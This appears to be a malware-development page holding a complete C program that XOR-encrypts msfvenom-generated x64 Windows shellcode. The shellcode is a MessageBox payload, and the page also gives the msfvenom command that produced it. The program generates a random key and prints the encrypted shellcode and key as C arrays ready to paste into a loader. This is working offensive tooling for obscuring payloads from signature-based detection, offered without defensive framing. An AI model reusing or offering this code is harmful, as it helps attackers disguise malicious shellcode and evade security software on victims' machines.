XOR Payload Encryption/Decryption
Code
Last updated
Last updated
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <stdbool.h>
//
// Payload initializing
// msfvenom -p windows/x64/messagebox TITLE='Payload Executed' TEXT='The payload was successfully executed!' -f c
//
unsigned char plaintext_payload[] =
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
"\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
"\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
"\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
"\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
"\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
"\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
"\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
"\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
"\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\xfe\x00\x00\x00\x3e"
"\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
"\x56\x07\xff\xd5\x48\x31\xc9\x41\xba\xf0\xb5\xa2\x56\xff"
"\xd5\x54\x68\x65\x20\x70\x61\x79\x6c\x6f\x61\x64\x20\x77"
"\x61\x73\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x6c"
"\x79\x20\x65\x78\x65\x63\x75\x74\x65\x64\x21\x00\x50\x61"
"\x79\x6c\x6f\x61\x64\x20\x45\x78\x65\x63\x75\x74\x65\x64"
"\x00";
unsigned int payload_len = sizeof( plaintext_payload );
int key_len = 16;
bool test_decryption = true;
//
// Helper function(s)
//
unsigned char* xor_payload( unsigned char *payload, unsigned char *key, unsigned int payload_length );
//
// Main function
//
int main( void )
{
//
// Declaring and initializing variables
//
int i = 0;
unsigned char *xor_key = calloc( key_len + 1, sizeof( unsigned char ) );
unsigned char *xor_ciphertext = NULL;
srand( time( NULL ) );
//
// Generate a randomized key
//
for( i = 0; i < key_len; i++ )
{
xor_key[i] = rand() % 256;
}
xor_key[key_len] = '\0';
printf( "\n" );
printf( "[+] YOUR RANDOMLY GENERATED KEY: \n" );
printf( "unsigned char xor_key[] = \"" );
for( i = 0; xor_key[i] != '\0'; i++ )
{
printf( "\\x%02X", xor_key[i] );
}
printf( "\n\n" );
//
// Call the helper XOR function
//
xor_ciphertext = xor_payload( plaintext_payload, xor_key, payload_len );
if( test_decryption == true )
{
printf("\n\n");
printf( "[!] TEST DECRYPTION BOOLEAN VARIABLE IS TRUE\n" );
printf( "[!] THE FOLLOWING IS TESTING THE ENCRYPTION PROCESS BY DECRYPTING IT WITH THE SAME KEY\n" );
printf( "[!] COMPARE IT TO THE ORIGINAL PAYLOAD IN THE CODE\n" );
unsigned char* xor_decrypted = xor_payload( xor_ciphertext, xor_key, payload_len );
free( xor_decrypted);
}
free( xor_key );
free( xor_ciphertext );
return 0;
}
//
// XOR encryption/decryption helper function
//
unsigned char* xor_payload( unsigned char *payload, unsigned char *key, unsigned int payload_length )
{
//
// Local variables
//
int i = 0;
unsigned char *result = calloc(payload_length, sizeof(unsigned char));
//
// Doing the XOR functionality
//
for( i = 0; i < payload_length - 1; i++ )
{
result[i] = payload[i] ^ key[i % key_len];
}
printf("[+] CORRESPONDING CIPHERTEXT PAYLOAD:\n");
printf( "unsigned char payload [] =\n\"" );
for( i = 0; i < payload_len - 1 ; i++ )
{
printf( "\\x%02X", result[i] );
if( ( i + 1 ) % 14 == 0 && i != 0 )
{
printf( "\"\n\"" );
}
if( i == payload_len - 2 && ( i + 1 ) % 14 != 0)
{
printf( "\"" );
}
}
return result;
}